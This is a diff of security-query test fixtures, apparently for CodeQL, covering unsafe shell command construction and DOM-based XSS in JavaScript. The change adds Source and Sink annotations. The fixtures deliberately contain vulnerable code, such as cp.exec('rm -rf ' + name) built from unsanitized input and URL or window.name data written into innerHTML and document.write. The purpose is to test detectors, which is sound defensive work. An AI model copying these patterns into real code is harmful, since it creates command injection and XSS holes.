@@ -623,15 +623,15 @@ module.exports.veryIndeirect = function (name) { if (moreIndirect(name) !== false) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert - cp.exec("rm -rf " + sanitized); // $ Alert +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" cp.exec("rm -rf " + sanitized); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index 6dc040fd7800..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index df2b9bd82e60..e268f47c4e20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index ba4bd7089693..0b1abc951286 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js 
@@ -1,15 +1,15 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); -module.exports.arrToShell = function (cmd, arr) { +module.exports.arrToShell = function (cmd, arr) { // $ Source cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index f2e6b7672f89..e6b7a10bacf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -export default function (name) { - cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. +export default function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index 67890f50fe82..853e144a0d62 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 8a79d2d66a66..f28c157a5ead 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js index 820349c5c62f..505f4e7af78a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js 
@@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index bc9e51562033..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 8d4a8cac6d0a..5c933dceff32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,13 +1,13 @@ -this.addEventListener('message', function(event) { +this.addEventListener('message', function(event) { // $ Source document.write(event.data); // $ Alert }) -this.addEventListener('message', function({data}) { +this.addEventListener('message', function({data}) { // $ Source document.write(data); // $ Alert }) function test() { - function foo(x, event, y) { + function foo(x, event, y) { // $ Source document.write(x.data); document.write(event.data); // $ Alert document.write(y.data); 
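Review bot: In subsub.js the `module.exports = function (name) {` line stays untagged while the `cp.exec` line below it gains `// $ Alert Sink`, whereas every sibling module in this commit tags the exported function line with `// $ Source`; the only hint is that `foo` in subLib4/index.js (tagged `// $ Source` in the hunk just above) reaches subsub through `dispatch[type](name)`. Presumably the parameter is not a source here because subsub is not reachable as a package export on its own, but the file does not say so, and the existing trailing comment explains why the alert fires, not why the parameter is not a source. A short note on the function line, e.g. `module.exports = function (name) { // not a Source: only reached via subLib4/index.js`, would make the expectation self-explaining.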
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 1b186b7db6a4..14d645d32c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js @@ -10,6 +10,6 @@ angular.module('myApp', []) } }); -addEventListener('message', (ev) => { +addEventListener('message', (ev) => { // $ Source Cookie.set("unsafe", ev.data); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index 8cda29a4e952..0d9f2d9fad21 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js @@ -7,7 +7,7 @@ function main() { document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert document.body.innerHTML = `Hello`; // $ Alert - let unsafeStyle = classNames.bind({foo: window.name}); + let unsafeStyle = classNames.bind({foo: window.name}); // $ Source document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); document.body.innerHTML = `Hello`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index abc11b06ea87..79970a0e1b77 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts 
@@ -5,7 +5,7 @@ function paste(e) { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('paste', (e) => { if (!clipboardData) return; const text = clipboardData.getData('text/plain'); - const html = clipboardData.getData('text/html'); + const html = clipboardData.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getClipboardData(e: ClipboardEvent): Promise } if (e.clipboardData.types.includes('text/html')) { - const droppedHtml = e.clipboardData.getData('text/html'); + const droppedHtml = e.clipboardData.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); @@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise const { data, inputType, isComposing, dataTransfer } = e; if (!dataTransfer) return; - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index c84f169995cb..df6fd9f439f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -1,7 +1,7 @@ const d3 = require('d3'); function getTaint() { - return window.name; + return window.name; // $ Source } function doSomething() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 97363f790da1..20e71516a9f7 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js @@ -6,7 +6,7 @@ import dateformat from 'dateformat'; function main() { let time = new Date(); - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert @@ -27,7 +27,7 @@ import MomentAdapter from "@date-io/moment"; import DayJSAdapter from "@date-io/dayjs" function dateio() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const dateFns = new DateFnsAdapter(); const luxon = new LuxonAdapter(); @@ -43,7 +43,7 @@ function dateio() { import { DateTime } from "luxon"; function luxon() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert @@ -51,7 +51,7 @@ function luxon() { } function dateio2() { - let taint = decodeURIComponent(window.location.hash.substring(1)); + let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source const moment = new MomentAdapter(); document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 2e3c92f36758..8371c4c49b91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,7 +5,7 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -40,7 +40,7 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); @@ -68,7 +68,7 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index f81f545809fa..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,5 +1,5 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' $("body", tainted); @@ -15,7 +15,7 @@ function test() { elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' $(hash.substring(1)); // $ Alert 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index f9958ea20999..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 74c96fdae902..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,7 +4,7 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index dcec3e388777..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); 
@@ -23,7 +23,7 @@ function test() { } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index b60ca27e0e47..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -2,7 +2,7 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <> @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 2e403f76ddae..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); + let tainted = req.param("code"); // $ Source ; // $ Alert ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 7bf77b18be10..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,19 +1,19 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); + let [state, setState] = useState(window.name); // $ Source return
; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); + setState(window.name); // $ Source return
; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); + setState(() => window.name); // $ Source return
; // $ Alert } @@ -22,7 +22,7 @@ function setStateValueLazy() { setState(prev => { document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 3ece85044bb3..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,7 +13,7 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); elt.innerHTML = "" + escapeHtml(tainted) + ""; elt.innerHTML = "
" + escapeAttr(tainted) + "
"; // $ MISSING: Alert - not flagged - diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6ee44babf8bf..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -1,6 +1,6 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source $('myId').html(sessionStorage.getItem('session')); // $ Alert $('myId').html(localStorage.getItem('session')); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a823a6ce004f..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -8,6 +8,6 @@ function foo(x, y, z) { } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index e1d26b45802d..0b181f836c46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,7 +3,7 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return 
@@ -19,6 +19,6 @@ function MyElement(props) { } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index d57844a89f28..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,7 +3,7 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); $('original-term').html(searchParams.get('term')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 34eae2dc6a5b..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,7 +1,7 @@ import * as lib from './trusted-types-lib'; const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert -policy1.createHTML(window.name); +policy1.createHTML(window.name); // $ Source const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); @@ -10,4 +10,4 @@ const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index 6fb538bd1c1b..7709e095601f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,5 +1,5 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -11,7 +11,7 @@ function test() { $('
'); $('
'); - let params = (new URL(document.location)).searchParams; + let params = (new URL(document.location)).searchParams; // $ Source $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); @@ -21,10 +21,10 @@ function test() { function foo(target) { $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } $('myId').html(bar()); // $ Alert @@ -50,12 +50,12 @@ $('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source $('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) $('myId').html(x); // $ Alert }); @@ -90,7 +90,7 @@ angular.module('myApp', []) }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source document.write(v); // $ Alert @@ -129,7 +129,7 @@ function tst() { function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ return function(v){ $("
").html(v); } // $ Alert @@ -139,7 +139,7 @@ function angularJSServices() { $("
").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { @@ -158,14 +158,14 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source document.body.innerHTML = tainted; // $ Alert @@ -178,7 +178,7 @@ function references() { } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert @@ -266,7 +266,7 @@ function jqueryLocation() { function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); var documentFragment = range.createContextualFragment(tainted); // $ Alert @@ -282,14 +282,14 @@ function flowThroughPropertyNames() { function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { $("body").append(e); // $ Alert @@ -308,7 +308,7 @@ function test2() { } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { 
@@ -322,21 +322,21 @@ function URLPseudoProperties() { function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search + var target = document.location.search // $ Source $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search + var target = document.location.search // $ Source this.html(target); // $ Alert - this is a jQuery object this.innerHTML = target // OK - this is a jQuery object @@ -352,7 +352,7 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target) // $ Alert @@ -361,7 +361,7 @@ function test() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source $('myId').html(target); // $ Alert @@ -371,7 +371,7 @@ function test() { target.taint2 = 2; $('myId').html(target.taint2); - target.taint3 = document.location.search; + target.taint3 = document.location.search; // $ Source $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 @@ -396,10 +396,10 @@ function test() { } function hash2() { - var payload = window.location.hash.substr(1); + var payload = window.location.hash.substr(1); // $ Source document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { document.write(match[1]); // $ Alert } @@ -408,7 +408,7 @@ function hash2() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert 
@@ -416,7 +416,7 @@ function nonGlobalSanitizer() { } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source new Element("div"); new Element("div", {text: source}); @@ -433,14 +433,14 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source $("#foo").html(source); // $ Alert $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); table.innerHTML = source; // $ Alert @@ -451,7 +451,7 @@ function domMethods() { } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source $("", {href: url}).appendTo("body"); // $ Alert $("#foo").attr("href", url); // $ Alert @@ -488,7 +488,7 @@ function Foo() { } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. 